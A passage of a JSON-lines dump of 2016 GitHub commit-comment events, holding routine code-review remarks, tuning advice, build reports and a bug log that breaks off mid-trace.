{"id":"4511436587","type":"CommitCommentEvent","actor":{"login":"prife"},"repo":{"name":"asLody/VirtualApp"},"payload":{"comment":{"id":18888486,"position":53,"line":199,"path":"VirtualApp/lib/src/main/java/com/lody/virtual/service/am/ActivityStack.java","commit_id":"02697aad0cf1b8029946e396e6ef40069b170214","created_at":"2016-09-03T02:02:40Z","updated_at":"2016-09-03T02:02:40Z","body":"这一段最终mHistory.remove(N)时没有加锁是否合理？与函数名字上的Locked不一致吧。或者说整个函数都应该加锁？"}},"created_at":"2016-09-03T02:02:40Z"}
{"id":"4511438379","type":"CommitCommentEvent","actor":{"login":"prife"},"repo":{"name":"asLody/VirtualApp"},"payload":{"comment":{"id":18888489,"position":22,"line":33,"path":"VirtualApp/lib/src/main/java/com/lody/virtual/client/stub/ShortcutHandleActivity.java","commit_id":"02697aad0cf1b8029946e396e6ef40069b170214","created_at":"2016-09-03T02:04:11Z","updated_at":"2016-09-03T02:04:11Z","body":"也许未来VActivityManager.get().startActivity，应该再封装出一个 VActivityManager.startActivity出来？"}},"created_at":"2016-09-03T02:04:11Z"}
{"id":"4511439327","type":"CommitCommentEvent","actor":{"login":"cemsbr"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18888490,"position":15,"line":15,"path":"tests/v0x02/test_controller_2switch/test_features_reply.py","commit_id":"2ad078eb7759413f8013b485e5213ab1e38159d1","created_at":"2016-09-03T02:04:59Z","updated_at":"2016-09-03T02:04:59Z","body":"This commit broke the tests because there are no dump files for v0x02. It is fixed already."}},"created_at":"2016-09-03T02:04:59Z"}
{"id":"4511439878","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18888491,"position":null,"line":null,"path":null,"commit_id":"608b13498ef71d7ae0d00eab39f4b3290e878585","created_at":"2016-09-03T02:05:21Z","updated_at":"2016-09-03T02:05:21Z","body":"Tuning is usually simple, but these piece values need some work to be compatible with the tuning model.\r\nHere is one possible solution.\r\n\r\n1) in types.h, change the code as follow\r\n\r\n`enum Value : int {\r\n  VALUE_ZERO      = 0,\r\n  VALUE_DRAW      = 0,\r\n  VALUE_KNOWN_WIN = 10000,\r\n  VALUE_MATE      = 32000,\r\n  VALUE_INFINITE  = 32001,\r\n  VALUE_NONE      = 32002,\r\n\r\n  VALUE_MATE_IN_MAX_PLY  =  VALUE_MATE - 2 * MAX_PLY,\r\n  VALUE_MATED_IN_MAX_PLY = -VALUE_MATE + 2 * MAX_PLY,\r\n\r\n  PawnValueEg   = 248,\r\n  KnightValueEg = 832,\r\n  BishopValueEg = 897,\r\n  RookValueEg   = 1371,\r\n  QueenValueEg  = 2650,\r\n\r\n  EndgameLimit  = 3915\r\n};\r\n\r\n\r\nextern Value PawnValueMg;\r\nextern Value KnightValueMg;\r\nextern Value BishopValueMg;\r\nextern Value RookValueMg;\r\nextern Value QueenValueMg;\r\nextern Value MidgameLimit;`\r\n\r\n2) in psqt.cpp, insert the following just below the `#include \"types.h`\r\n`Value PawnValueMg = Value(188);\r\nValue KnightValueMg = Value(753);\r\nValue BishopValueMg = Value(826);\r\nValue RookValueMg = Value(1285);\r\nValue QueenValueMg = Value(2513);\r\nValue MidgameLimit = Value(15259);`\r\n\r\n3) on the last line of psqt.cpp, you can keep your current \r\n`TUNE(PawnValueMg, KnightValueMg, BishopValueMg, RookValueMg, QueenValueMg, PSQT::init);`\r\n\r\nbut I recommend to leave the PawnValueMg, this way your tuning will be more stable\r\n`TUNE(KnightValueMg, BishopValueMg, RookValueMg, QueenValueMg, PSQT::init);`\r\n\r\n "}},"created_at":"2016-09-03T02:05:21Z"}
{"id":"4511440131","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":18888492,"position":null,"line":null,"path":null,"commit_id":"e9263098e19646158afe166f2dc69cbf014d1745","created_at":"2016-09-03T02:05:33Z","updated_at":"2016-09-03T02:05:33Z","body":"++"}},"created_at":"2016-09-03T02:05:33Z"}
{"id":"4511442898","type":"CommitCommentEvent","actor":{"login":"nolanlawson"},"repo":{"name":"nolanlawson/pouchdb-adapter-fs"},"payload":{"comment":{"id":18888499,"position":null,"line":null,"path":null,"commit_id":"a493be41d7eae6f97290b89d662af8a644518876","created_at":"2016-09-03T02:07:54Z","updated_at":"2016-09-03T02:07:54Z","body":"Commented elsewhere @gr2m, but you can basically just remove all these files. I did for worker-pouch and socket-pouch as well; they're not needed for adapters."}},"created_at":"2016-09-03T02:07:54Z"}
{"id":"4511443010","type":"CommitCommentEvent","actor":{"login":"buxingzhe7"},"repo":{"name":"buxingzhe7/myfirstGithubProject"},"payload":{"comment":{"id":18888500,"position":null,"line":null,"path":null,"commit_id":"c20d717a0f78e1ff14476ef37a0c9aad57521bb0","created_at":"2016-09-03T02:08:00Z","updated_at":"2016-09-03T02:08:00Z","body":"1111"}},"created_at":"2016-09-03T02:08:00Z"}
{"id":"4511443190","type":"CommitCommentEvent","actor":{"login":"buxingzhe7"},"repo":{"name":"buxingzhe7/myfirstGithubProject"},"payload":{"comment":{"id":18888501,"position":null,"line":null,"path":null,"commit_id":"c20d717a0f78e1ff14476ef37a0c9aad57521bb0","created_at":"2016-09-03T02:08:09Z","updated_at":"2016-09-03T02:08:09Z","body":"with 0 additions and 0 deletions."}},"created_at":"2016-09-03T02:08:09Z"}
{"id":"4511444443","type":"CommitCommentEvent","actor":{"login":"matheushf"},"repo":{"name":"matheushf/generator-angularfire-express"},"payload":{"comment":{"id":18888503,"position":null,"line":null,"path":null,"commit_id":"1b0d4d1cb78e2daa3bef062b3502a74a0f10671d","created_at":"2016-09-03T02:09:14Z","updated_at":"2016-09-03T02:09:14Z","body":"#3 "}},"created_at":"2016-09-03T02:09:14Z"}
{"id":"4511448251","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"zacharyacutey/MyStuff"},"payload":{"comment":{"id":18888509,"position":null,"line":null,"path":null,"commit_id":"25e54d268c5aaa56d26552891c0f5f4977e02edf","created_at":"2016-09-03T02:12:31Z","updated_at":"2016-09-03T02:12:31Z","body":"I GOT IT TO DISPLAY IN ONE LINE!!!!! HAHAHAHA!"}},"created_at":"2016-09-03T02:12:31Z"}
{"id":"4511448848","type":"CommitCommentEvent","actor":{"login":"brijohn"},"repo":{"name":"brijohn/exabgp"},"payload":{"comment":{"id":18888511,"position":null,"line":null,"path":null,"commit_id":"4ca039e834577d7a7f285659a4f852177cfc1150","created_at":"2016-09-03T02:13:02Z","updated_at":"2016-09-03T02:13:02Z","body":"With this patch applied syslog message appear in the standard syslog format which not only makes things look nicer when viewing the syslog it also make regex's used for syslog parsing simpler as well."}},"created_at":"2016-09-03T02:13:02Z"}
{"id":"4511451110","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18888516,"position":null,"line":null,"path":null,"commit_id":"45422611d9ddba82abb68946db65a50246f52820","created_at":"2016-09-03T02:15:09Z","updated_at":"2016-09-03T02:15:09Z","body":"Related to: backdrop/backdrop-issues#2122 "}},"created_at":"2016-09-03T02:15:09Z"}
{"id":"4511451313","type":"CommitCommentEvent","actor":{"login":"prashantkhurana"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18888517,"position":22,"line":267,"path":"app/src/main/java/me/ccrama/redditslide/CommentCacheAsync.java","commit_id":"17e6bd954de1aca76636f65dc04aa154330c3124","created_at":"2016-09-03T02:15:18Z","updated_at":"2016-09-03T02:15:18Z","body":"this throws an NPE as mbuilder can be null. Just need to add a \r\n`if (mBuilder != null) '`\r\ncheck. will add it."}},"created_at":"2016-09-03T02:15:18Z"}
{"id":"4511452757","type":"CommitCommentEvent","actor":{"login":"yacktu"},"repo":{"name":"yacktu/game_of_life"},"payload":{"comment":{"id":18888519,"position":null,"line":null,"path":null,"commit_id":"77e7809299323906b21b523f8f2e3b52cc531ecc","created_at":"2016-09-03T02:16:35Z","updated_at":"2016-09-03T02:16:35Z","body":"Instructions"}},"created_at":"2016-09-03T02:16:35Z"}
{"id":"4511455120","type":"CommitCommentEvent","actor":{"login":"ivansglazunov"},"repo":{"name":"ivansglazunov/emitter"},"payload":{"comment":{"id":18888523,"position":null,"line":null,"path":null,"commit_id":"9c2828a8070de58d74aa2895cb582c32ef503121","created_at":"2016-09-03T02:18:46Z","updated_at":"2016-09-03T02:18:46Z","body":"Am... realy? Published without testing?\r\nMay be add to scripts `\"prepublish\": \"npm test\"`?"}},"created_at":"2016-09-03T02:18:46Z"}
{"id":"4511455272","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18888524,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-03T02:18:55Z","updated_at":"2016-09-03T02:18:55Z","body":"Congrats!!"}},"created_at":"2016-09-03T02:18:55Z"}
{"id":"4511455843","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888525,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-03T02:19:25Z","updated_at":"2016-09-03T02:19:25Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1761 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-03T02:19:25Z"}
{"id":"4511457523","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18888530,"position":null,"line":null,"path":null,"commit_id":"e344f54712750302d19fe4e93aedd10f2e3f2003","created_at":"2016-09-03T02:20:45Z","updated_at":"2016-09-03T02:20:45Z","body":"For tuning of the King, I think that if you add x to all the mbonus[6][][] and ebonus[6][][], you would end up with the exact same bench. \r\nTherefore, if you do more tuning experiments on the PSQT, it is preferable, for tuning stability, to keep one king square out of tuning, this will act as an anchor for the other king squares."}},"created_at":"2016-09-03T02:20:45Z"}
{"id":"4511462670","type":"CommitCommentEvent","actor":{"login":"wiking-at"},"repo":{"name":"offensive-security/nethunter-devices"},"payload":{"comment":{"id":18888535,"position":null,"line":null,"path":null,"commit_id":"5deaba4fb9891d2dee4777c96179b4dfa05443a2","created_at":"2016-09-03T02:25:33Z","updated_at":"2016-09-03T02:25:33Z","body":" how can one get wifi running with this kernel?\r\n\r\ni did git build (nethunter-hammerheadmon-marshmallow-kalifs-full-20160903_015850.zip) and loaded the kernel module.\r\n\r\n```\r\ninsmod /data/local/nhsystem/nexus5/bcmdhd.ko\r\nifconfig wlan0 up\r\n```\r\nalthough the interface is shown now  i can't get wlan0 running.\r\n\r\n```\r\nroot@hammerhead:/data/local/nhsystem/nexus5 # ifconfig wlan0\r\nwlan0     Link encap:UNSPEC\r\n          BROADCAST MULTICAST  MTU:1500  Metric:1\r\n          RX packets:0 errors:0 dropped:150 overruns:0 frame:0\r\n          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n          collisions:0 txqueuelen:1000\r\n          RX bytes:27034 TX bytes:0\r\n\r\n```\r\ndo you have any notes flying around on how to set this up properly?"}},"created_at":"2016-09-03T02:25:33Z"}
{"id":"4511464474","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18888538,"position":null,"line":null,"path":null,"commit_id":"078b7ce2e4374179cb9bcc4bbeab894a4609fdc1","created_at":"2016-09-03T02:27:14Z","updated_at":"2016-09-03T02:27:14Z","body":"This wasn't passed to 1.10 and later... !?"}},"created_at":"2016-09-03T02:27:14Z"}
{"id":"4511466057","type":"CommitCommentEvent","actor":{"login":"OdeToCode"},"repo":{"name":"MaherJendoubi/SimplCommerce"},"payload":{"comment":{"id":18888540,"position":null,"line":null,"path":null,"commit_id":"bafa500585b46bcd620bce38aa867332a6fae71c","created_at":"2016-09-03T02:28:41Z","updated_at":"2016-09-03T02:28:41Z","body":"I like it!"}},"created_at":"2016-09-03T02:28:41Z"}
{"id":"4511466594","type":"CommitCommentEvent","actor":{"login":"astumpf"},"repo":{"name":"ROBOTIS-GIT/ROBOTIS-Framework"},"payload":{"comment":{"id":18888541,"position":82,"line":1610,"path":"robotis_controller/src/robotis_controller/robotis_controller.cpp","commit_id":"09d54945f74af783d0969944b495aadcba6c919d","created_at":"2016-09-03T02:29:09Z","updated_at":"2016-09-03T02:29:09Z","body":"This lock should happpen earlier. Otherwise there is a risk of race condition with process(...)."}},"created_at":"2016-09-03T02:29:09Z"}
{"id":"4511467117","type":"CommitCommentEvent","actor":{"login":"astumpf"},"repo":{"name":"ROBOTIS-GIT/ROBOTIS-Framework"},"payload":{"comment":{"id":18888545,"position":295,"line":1826,"path":"robotis_controller/src/robotis_controller/robotis_controller.cpp","commit_id":"09d54945f74af783d0969944b495aadcba6c919d","created_at":"2016-09-03T02:29:36Z","updated_at":"2016-09-03T02:29:36Z","body":"This lock should happpen earlier. Otherwise there is a risk of race condition with process(...)."}},"created_at":"2016-09-03T02:29:36Z"}
{"id":"4511467132","type":"CommitCommentEvent","actor":{"login":"nguyenthilanphuong"},"repo":{"name":"nguyenthilanphuong/AdvancedJava_Everyday_LanPhuong"},"payload":{"comment":{"id":18888546,"position":null,"line":null,"path":null,"commit_id":"e39e36b5fa495a33a9cf11c809d56e15e2635817","created_at":"2016-09-03T02:29:37Z","updated_at":"2016-09-03T02:29:37Z","body":"https://github.com/nguyenthilanphuong/JavaEveryDay/blob/master/AdvancedJava_Chapter1_Part1_LanPhuong.rar"}},"created_at":"2016-09-03T02:29:37Z"}
{"id":"4511467898","type":"CommitCommentEvent","actor":{"login":"astumpf"},"repo":{"name":"ROBOTIS-GIT/ROBOTIS-Framework"},"payload":{"comment":{"id":18888548,"position":null,"line":null,"path":null,"commit_id":"09d54945f74af783d0969944b495aadcba6c919d","created_at":"2016-09-03T02:30:17Z","updated_at":"2016-09-03T02:30:17Z","body":"Please take care of correct lock timing of mutexes to prevent race conditions."}},"created_at":"2016-09-03T02:30:17Z"}
{"id":"4511469829","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18888557,"position":null,"line":null,"path":null,"commit_id":"14daf5fe1c3e162c199645c4f5a87a8fab3657a5","created_at":"2016-09-03T02:31:57Z","updated_at":"2016-09-03T02:31:57Z","body":"This change wasn't applied to 1.10.x and later. Why?"}},"created_at":"2016-09-03T02:31:57Z"}
{"id":"4511471122","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18888561,"position":null,"line":null,"path":null,"commit_id":"c728fdf5d42b257584b8a8ff704feeda4f67cfda","created_at":"2016-09-03T02:33:06Z","updated_at":"2016-09-03T02:33:06Z","body":"This change wasn't applied to 1.10.x and followers. Why?"}},"created_at":"2016-09-03T02:33:06Z"}
{"id":"4511471240","type":"CommitCommentEvent","actor":{"login":"Kromizon"},"repo":{"name":"Phineas/RankCommand"},"payload":{"comment":{"id":18888562,"position":1,"line":2,"path":"src/config.yml","commit_id":"21369ecb27656f8448b92877dc85110beb2af5e6","created_at":"2016-09-03T02:33:11Z","updated_at":"2016-09-03T02:33:11Z","body":"im funy"}},"created_at":"2016-09-03T02:33:11Z"}
{"id":"4511471517","type":"CommitCommentEvent","actor":{"login":"Kromizon"},"repo":{"name":"Phineas/RankCommand"},"payload":{"comment":{"id":18888563,"position":1,"line":2,"path":"src/config.yml","commit_id":"21369ecb27656f8448b92877dc85110beb2af5e6","created_at":"2016-09-03T02:33:24Z","updated_at":"2016-09-03T02:33:24Z","body":"oh"}},"created_at":"2016-09-03T02:33:24Z"}
{"id":"4511475872","type":"CommitCommentEvent","actor":{"login":"nguyenthilanphuong"},"repo":{"name":"nguyenthilanphuong/AdvancedJava_Everyday_LanPhuong"},"payload":{"comment":{"id":18888569,"position":null,"line":null,"path":null,"commit_id":"8e7264acdccbaf7a4f660f9a48ac63407e859a7c","created_at":"2016-09-03T02:37:12Z","updated_at":"2016-09-03T02:37:12Z","body":"It was done from 12 days ago"}},"created_at":"2016-09-03T02:37:12Z"}
{"id":"4511477525","type":"CommitCommentEvent","actor":{"login":"hyepark"},"repo":{"name":"hyepark/src"},"payload":{"comment":{"id":18888572,"position":null,"line":null,"path":null,"commit_id":"cf4b894172d59a3c6900a362e380fe2be60ac888","created_at":"2016-09-03T02:38:38Z","updated_at":"2016-09-03T02:38:38Z","body":"updated"}},"created_at":"2016-09-03T02:38:38Z"}
{"id":"4511477608","type":"CommitCommentEvent","actor":{"login":"Mobettavijion"},"repo":{"name":"marlonjackson/validation-lab"},"payload":{"comment":{"id":18888573,"position":null,"line":null,"path":null,"commit_id":"ccc64276872c9131f7895d872d76594c7780f698","created_at":"2016-09-03T02:38:43Z","updated_at":"2016-09-03T02:38:43Z","body":"already made changes in Brackets and my changes were saved and tested. I'm trying to commit new changes and push. I'm making very bad mistakes on files name and locations of files"}},"created_at":"2016-09-03T02:38:43Z"}
{"id":"4511480992","type":"CommitCommentEvent","actor":{"login":"bdeanindy"},"repo":{"name":"grokify/smsbot-ringcentral-lita"},"payload":{"comment":{"id":18888577,"position":null,"line":null,"path":null,"commit_id":"2801e3b50ebc35f6b018b796f7b487b361bd8615","created_at":"2016-09-03T02:41:31Z","updated_at":"2016-09-03T02:41:31Z","body":"This commit of the PR resolves Issue #9 "}},"created_at":"2016-09-03T02:41:31Z"}
{"id":"4511482281","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888582,"position":26,"line":26,"path":"addons/zeusMonitor/functions/fnc_toggleAutoCleanup.sqf","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:42:36Z","updated_at":"2016-09-03T02:42:36Z","body":"Where is this set?"}},"created_at":"2016-09-03T02:42:36Z"}
{"id":"4511484018","type":"CommitCommentEvent","actor":{"login":"PabstMirror"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888583,"position":26,"line":26,"path":"addons/zeusMonitor/functions/fnc_toggleAutoCleanup.sqf","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:44:10Z","updated_at":"2016-09-03T02:44:10Z","body":"ace sets this, no prefix which is weird"}},"created_at":"2016-09-03T02:44:10Z"}
{"id":"4511484175","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888584,"position":52,"line":52,"path":"addons/zeusMonitor/functions/fnc_toggleAutoCleanup.sqf","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:44:18Z","updated_at":"2016-09-03T02:44:18Z","body":"Do we have to clean up any dead vehicles/ground weapons containers?"}},"created_at":"2016-09-03T02:44:18Z"}
{"id":"4511485858","type":"CommitCommentEvent","actor":{"login":"wizpig64"},"repo":{"name":"wizpig64/sixthings"},"payload":{"comment":{"id":18888585,"position":null,"line":null,"path":null,"commit_id":"0062c971150567f64e9d9500bd73a66e24db4d85","created_at":"2016-09-03T02:45:43Z","updated_at":"2016-09-03T02:45:43Z","body":"s/app/views/"}},"created_at":"2016-09-03T02:45:43Z"}
{"id":"4511487866","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888586,"position":26,"line":26,"path":"addons/zeusMonitor/functions/fnc_toggleAutoCleanup.sqf","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:47:09Z","updated_at":"2016-09-03T02:47:09Z","body":"Looks like it's part of medical, do we have to worry about any non-medical based deaths (disconnects or scripted?). Do we know if this variable will persist if a player is `switch`ed out of the body?"}},"created_at":"2016-09-03T02:47:09Z"}
{"id":"4511488936","type":"CommitCommentEvent","actor":{"login":"songjinzhong"},"repo":{"name":"1exciting/BD_FET"},"payload":{"comment":{"id":18888588,"position":18,"line":18,"path":"stage2/task17/dang/index.html","commit_id":"b54fa0e344e12064c67dd502d3dd06b15100dbba","created_at":"2016-09-03T02:47:57Z","updated_at":"2016-09-03T02:47:57Z","body":"这个flex的布局很赞！"}},"created_at":"2016-09-03T02:47:57Z"}
{"id":"4511490357","type":"CommitCommentEvent","actor":{"login":"philmander"},"repo":{"name":"philmander/browser-bunyan"},"payload":{"comment":{"id":18888590,"position":21,"line":17,"path":"README.md","commit_id":"f95165cc8364d93f6bf605048d1166783a7d2a40","created_at":"2016-09-03T02:48:54Z","updated_at":"2016-09-03T02:48:54Z","body":"Yes\r\n"}},"created_at":"2016-09-03T02:48:54Z"}
{"id":"4511491288","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"GMNetwork/TF-Auth"},"payload":{"comment":{"id":18888593,"position":3,"line":0,"path":"resources/config.yml","commit_id":"825d28b9c38cf6e4c6627d2ec934adbaea5eab3d","created_at":"2016-09-03T02:49:40Z","updated_at":"2016-09-03T02:49:40Z","body":"oops :/"}},"created_at":"2016-09-03T02:49:40Z"}
{"id":"4511492396","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888595,"position":41,"line":41,"path":"addons/zeusMonitor/functions/fnc_toggleAutoCleanup.sqf","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:50:28Z","updated_at":"2016-09-03T02:50:28Z","body":"Use `aimPos` or just `getPos` here for the dead body instead of `eyePos`?"}},"created_at":"2016-09-03T02:50:28Z"}
{"id":"4511493366","type":"CommitCommentEvent","actor":{"login":"Awakened0"},"repo":{"name":"libretro/slang-shaders"},"payload":{"comment":{"id":18888596,"position":null,"line":null,"path":null,"commit_id":"d1e050686b5c6412b80df759672da5e8b3782fef","created_at":"2016-09-03T02:51:10Z","updated_at":"2016-09-03T02:51:10Z","body":"Looks perfect in a quick screenshot comparison I did between slang and cg. Thanks!"}},"created_at":"2016-09-03T02:51:10Z"}
{"id":"4511493847","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888599,"position":15,"line":15,"path":"addons/zeusMonitor/functions/fnc_toggleAutoCleanup.sqf","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:51:35Z","updated_at":"2016-09-03T02:51:35Z","body":"Extract this logic into a function for readability?"}},"created_at":"2016-09-03T02:51:35Z"}
{"id":"4511497107","type":"CommitCommentEvent","actor":{"login":"philmander"},"repo":{"name":"philmander/browser-bunyan"},"payload":{"comment":{"id":18888603,"position":29,"line":25,"path":"README.md","commit_id":"f95165cc8364d93f6bf605048d1166783a7d2a40","created_at":"2016-09-03T02:54:26Z","updated_at":"2016-09-03T02:54:26Z","body":"Not sure if I understand your context. In the browser, the `window` object is your Javascript global scope and is always available.\r\n\r\nYou don't have to access bunyan explicitly on the `window` object though. If included with a script tag it will be defined just when using `bunyan`"}},"created_at":"2016-09-03T02:54:26Z"}
{"id":"4511498191","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":18888606,"position":null,"line":null,"path":null,"commit_id":"f43e4f67cbd1be7e3fe6a6877461e66934656de6","created_at":"2016-09-03T02:55:26Z","updated_at":"2016-09-03T02:55:26Z","body":"Thanks!"}},"created_at":"2016-09-03T02:55:26Z"}
{"id":"4511498217","type":"CommitCommentEvent","actor":{"login":"brendansudol"},"repo":{"name":"18F/identity-playbook"},"payload":{"comment":{"id":18888607,"position":14,"line":25,"path":"index.html","commit_id":"c258917dd1b3782810c2899c1611df30a356a96c","created_at":"2016-09-03T02:55:27Z","updated_at":"2016-09-03T02:55:27Z","body":"@hursey013 i think the `sm-pt2` right after the width attribute needs to be moved / removed"}},"created_at":"2016-09-03T02:55:27Z"}
{"id":"4511499573","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18888608,"position":null,"line":null,"path":null,"commit_id":"5eedc23288897d1c532c84cb5c81324f99ec282b","created_at":"2016-09-03T02:56:36Z","updated_at":"2016-09-03T02:56:36Z","body":"++"}},"created_at":"2016-09-03T02:56:36Z"}
{"id":"4511501783","type":"CommitCommentEvent","actor":{"login":"Shineta"},"repo":{"name":"TobiiTechnology/EyeXforUE4"},"payload":{"comment":{"id":18888609,"position":null,"line":null,"path":null,"commit_id":"a7eb9385568146e5a5da7c7dd8d5a226bbf50734","created_at":"2016-09-03T02:58:29Z","updated_at":"2016-09-03T02:58:29Z","body":"Added"}},"created_at":"2016-09-03T02:58:29Z"}
{"id":"4511502407","type":"CommitCommentEvent","actor":{"login":"SonicNorg"},"repo":{"name":"sbt-java-school/Andrey.Vinogradov"},"payload":{"comment":{"id":18888612,"position":131,"line":128,"path":"src/main/java/ru/sbt/home/task05/CacheType.java","commit_id":"1e01f7eb7b1720f7238cc9d5b09eb1a50f1d5212","created_at":"2016-09-03T02:59:04Z","updated_at":"2016-09-03T02:59:04Z","body":"Тестовый коммент"}},"created_at":"2016-09-03T02:59:04Z"}
{"id":"4511502411","type":"CommitCommentEvent","actor":{"login":"AACO"},"repo":{"name":"BourbonWarfare/POTATO"},"payload":{"comment":{"id":18888613,"position":22,"line":24,"path":"addons/zeusMonitor/RscDisplayCurator.hpp","commit_id":"932a17a8033a808fcc801b02f1f032f819460310","created_at":"2016-09-03T02:59:04Z","updated_at":"2016-09-03T02:59:04Z","body":"Should we have this run on the server? I know it add some sync pain points."}},"created_at":"2016-09-03T02:59:04Z"}
{"id":"4512670539","type":"CommitCommentEvent","actor":{"login":"radwa0"},"repo":{"name":"yannickcr/eslint-plugin-react"},"payload":{"comment":{"id":18891009,"position":null,"line":null,"path":null,"commit_id":"55b9cbe007302336f92c005aadd0d6323cdfe488","created_at":"2016-09-03T20:00:01Z","updated_at":"2016-09-03T20:00:01Z","body":"i have\r\n\r\nthis.domNode = node} style={this.getStyle()}>{ this.props.children }\r\nwhen i do this\r\nthis.domNode.addEventListener('mousedown', this.onDrag);\r\n\r\nthere is an error\r\nthis.domNode.addEventListener is not a function"}},"created_at":"2016-09-03T20:00:01Z"}
{"id":"4512675194","type":"CommitCommentEvent","actor":{"login":"varunvora"},"repo":{"name":"Ancientae0N/WTproject"},"payload":{"comment":{"id":18891014,"position":3,"line":1,"path":"README.md","commit_id":"4cbe26c0f737086384bd7c5d6b0c20bbd10e73eb","created_at":"2016-09-03T20:03:06Z","updated_at":"2016-09-03T20:03:06Z","body":"Web Technologies project for 3rd semester Computer Science undergraduates. Cheat sheet blog is a portal for quick-reference material where people can submit, upvote, downvote and star cheat sheets."}},"created_at":"2016-09-03T20:03:06Z"}
{"id":"4512676285","type":"CommitCommentEvent","actor":{"login":"pkeuter"},"repo":{"name":"CasparCG/Server"},"payload":{"comment":{"id":18891017,"position":null,"line":null,"path":null,"commit_id":"3244515935c97dc77516743c98d5cf9cd133258d","created_at":"2016-09-03T20:04:02Z","updated_at":"2016-09-03T20:04:02Z","body":"@HellGore I've built and tested this version but there still is a promise-related error, although it's different now: We've switched from a \"promise already satisfied\" to \"broken promise\". Any idea?\r\n```\r\n[2016-09-03 21:59:31.871] [1128] [error]   Dynamic exception type: class std::future_error\r\n[2016-09-03 21:59:31.871] [1128] [error]   std::exception::what: broken promise\r\n[2016-09-03 21:59:31.871] [1128] [error]   Caught at (output 1):\r\n[2016-09-03 21:59:31.871] [1128] [error]   \r\n[2016-09-03 21:59:31.871] [1128] [error]       c:\\program files (x86)\\microsoft visual studio 14.0\\vc\\include\\type_traits (1335): std::_Decay_copy<<lambda_a472ef372759cf5359e2532308ba9c07> >\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000013F7E23C8 (casparcg): (filename not available): std::_Tree<std::_Tset_traits<std::array<unsigned char const * __ptr64,4>,std::less<std::array<unsigned char const * __ptr64,4> >,std::allocator<std::array<unsigned char const * __ptr64,4> >,0> >::_Insert_at<std::array<unsigned char const * __ptr64,4> const & __ptr64,std::_Nil>\r\n[2016-09-03 21:59:31.871] [1128] [error]       c:\\program files (x86)\\jenkins\\jobs\\casparcg_server_2.1.0\\workspace\\modules\\psd\\psd_scene_producer.cpp (374): caspar::psd::create_psd_scene_producer\r\n[2016-09-03 21:59:31.871] [1128] [error]       000007FEF823C710 (VCRUNTIME140): (filename not available): _C_specific_handler\r\n[2016-09-03 21:59:31.871] [1128] [error]       000007FEF8232AC2 (VCRUNTIME140): (filename not available): _FrameUnwindFilter\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000007789CD51 (ntdll): (filename not available): RtlRestoreContext\r\n[2016-09-03 21:59:31.871] [1128] [error]       c:\\program files (x86)\\jenkins\\jobs\\casparcg_server_2.1.0\\workspace\\common\\log.cpp (141): caspar::log::my_formatter<boost::log::v2s_mt_nt5::basic_formatting_ostream<char,std::char_traits<char>,std::allocator<char> > >\r\n[2016-09-03 21:59:31.871] [1128] [error]       000000013F87DF60 (casparcg): (filename not available): 